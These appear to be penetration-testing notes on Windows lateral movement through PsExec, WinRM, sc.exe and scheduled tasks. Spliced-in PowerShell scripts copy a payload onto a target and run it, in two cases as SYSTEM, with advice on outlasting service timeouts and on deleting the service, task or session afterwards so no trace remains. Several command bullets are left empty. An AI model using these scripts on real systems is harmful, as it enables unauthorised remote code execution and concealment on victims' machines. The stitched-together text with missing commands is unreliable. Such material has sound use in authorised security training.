Remote process

1. PsExec

  • Ports: 445/TCP (SMB)

  • Required Group Memberships: Administrators (on the remote target)

  • Command:

    psexec64.exe \\MACHINE_IP -u Administrator -p <PASSWORD> -i cmd.exe

  • How it works: PsExec copies psexesvc.exe into the target's ADMIN$ share, registers it as a service through the Service Control Manager, starts it, and relays the command's stdin/stdout over named pipes. That is why SMB is the only port needed and why an administrative account is required (write access to ADMIN$ plus service creation rights). The program to run must be the last argument; everything before it is parsed as a PsExec option.

2. Remote Process Creation Using WinRM

  • Ports:

    • 5985/TCP (WinRM HTTP)

    • 5986/TCP (WinRM HTTPS)

  • Required Group Memberships: Remote Management Users (local Administrators are also allowed by default)

Commands

  • Interactive session:

    $username = 'Administrator'
    $password = '<PASSWORD>'
    $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
    $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)

    # Start an interactive session
    Enter-PSSession -ComputerName TARGET -Credential $credential
  • Execute a single command:

    Invoke-Command -ComputerName TARGET -Credential $credential -ScriptBlock { whoami }
  • WinRS Command:

    winrs.exe -u:Administrator -p:<PASSWORD> -r:TARGET cmd

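The three commands above each authenticate once and run one thing. When several steps are needed on the same host (stage a file, run it, read the result), one persistent session avoids repeated logons and leaves a single WinRM shell to clean up. The following is an added example, not part of the original notes; TARGET, the credentials and the local payload path are placeholders.

```powershell
# Added example (not from the original notes): reuse one WinRM session for several
# operations instead of re-authenticating per command. TARGET, the credentials and
# the local file path are placeholders.
$username = 'Administrator'
$password = '<PASSWORD>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)

# Confirm the WinRM listener answers before trying to authenticate (5985/TCP by default).
Test-WSMan -ComputerName TARGET -ErrorAction Stop | Out-Null

# One authenticated session; add -UseSSL to talk to the HTTPS listener on 5986/TCP instead.
$session = New-PSSession -ComputerName TARGET -Credential $credential

try {
    # Stage a local file onto the target through the same session (PowerShell 5.0+).
    Copy-Item -Path 'C:\tools\payload.exe' -Destination 'C:\Windows\Temp\payload.exe' -ToSession $session

    # Run it and collect the result; -ArgumentList carries parameters into the remote scriptblock.
    Invoke-Command -Session $session -ScriptBlock {
        param($exe)
        Start-Process -FilePath $exe -Wait
        whoami
    } -ArgumentList 'C:\Windows\Temp\payload.exe'
}
finally {
    # Always tear the session down so no idle WinRM shell is left on the target.
    Remove-PSSession -Session $session
}
```

Commands run through Invoke-Command execute in the context of the authenticating user, so whoami above reports Administrator, not SYSTEM; use the service or scheduled-task techniques below when SYSTEM is required.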
3. Remotely Creating Services Using sc

  • Ports:

    • 135/TCP, 49152-65535/TCP (DCE/RPC)

    • 445/TCP, 139/TCP (RPC over SMB Named Pipes)

  • Required Group Memberships: Administrators

Commands

  • Create a service:

  • Start the service:

  • Stop the service:

  • Delete the service:

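The full create/start/stop/delete cycle, as an added example that is not part of the original notes. TARGET, the service name and the payload path are placeholders; the payload must already exist on the target (for instance copied through the ADMIN$ share).

```powershell
# Added example (not from the original notes): create, run and clean up a service on a
# remote host with sc.exe. TARGET, the service name and the payload path are placeholders.
# In PowerShell 'sc' is an alias for Set-Content, so always call sc.exe explicitly.
$target  = '\\TARGET'
$svcName = 'UpdaterSvc'
$payload = 'C:\Windows\Temp\payload.exe'

# binPath= and start= need the space after '=' (sc.exe argument parsing quirk).
sc.exe $target create $svcName binPath= "$payload" start= demand
if ($LASTEXITCODE -ne 0) { throw "Service creation failed (sc.exe exit code $LASTEXITCODE)" }

# Starting the service executes binPath as SYSTEM. A binary that is not a real service
# never calls StartServiceCtrlDispatcher, so the SCM reports error 1053 (timeout) after
# roughly 30 s even though the payload has already run. sc.exe exits with the Win32
# error code, so 1053 here means 'launched, no service handshake', not 'did not run'.
sc.exe $target start $svcName
if ($LASTEXITCODE -eq 1053) { Write-Host 'Payload launched; SCM timed out waiting for the service handshake.' }

# Check the recorded state, then stop and remove the service so no persistence remains.
# stop fails harmlessly with 1062 if the payload process has already exited.
sc.exe $target query $svcName
sc.exe $target stop $svcName
sc.exe $target delete $svcName
```

Because the SCM kills a non-service binary when the start timeout expires, a payload launched this way should spawn its real work in a separate process (or be a proper service) if it needs to outlive that window.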

4. Creating Scheduled Tasks Remotely

  • Ports:

    • 135/TCP, 49152-65535/TCP (DCE/RPC)

    • 445/TCP (RPC over SMB Named Pipes)

  • Required Group Memberships: Administrators

  • Command to Create a Task:

  • Command to Run a Task:

  • Command to Delete a Task:

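The create/run/verify/delete cycle with schtasks, as an added example that is not part of the original notes. TARGET, the task name and the payload are placeholders; add /u and /p to each command if the current logon does not already hold administrative rights on the target.

```powershell
# Added example (not from the original notes): one-shot task on a remote host run as SYSTEM.
# TARGET, the task name and the payload are placeholders.
$target   = 'TARGET'
$taskName = 'UpdaterTask'
$payload  = 'C:\Windows\Temp\payload.exe'

# /sc ONCE requires a start date and time. A date in the past means the trigger never
# fires on its own, so the only execution is the one requested explicitly below.
# /sd uses the target's locale date format (MM/DD/YYYY on an English system).
schtasks /s $target /ru 'SYSTEM' /create /tn $taskName /tr $payload /sc ONCE /sd 01/01/1970 /st 00:00
if ($LASTEXITCODE -ne 0) { throw "Task creation failed (schtasks exit code $LASTEXITCODE)" }

# Fire it now. Unlike a service binary, the payload does not need to speak the SCM protocol,
# so it is not killed after a start timeout.
schtasks /s $target /run /tn $taskName

# Verify it actually ran: the verbose listing carries 'Last Run Time' and 'Last Result'.
schtasks /s $target /query /tn $taskName /v /fo LIST | Select-String 'Last Run Time', 'Last Result'

# Remove the task so nothing survives under C:\Windows\System32\Tasks on the target.
schtasks /s $target /delete /tn $taskName /f
```

'Last Result' is the payload's own exit code as recorded by the Task Scheduler; a non-zero value there means the task ran but the payload failed, which is a different problem from the task never being triggered.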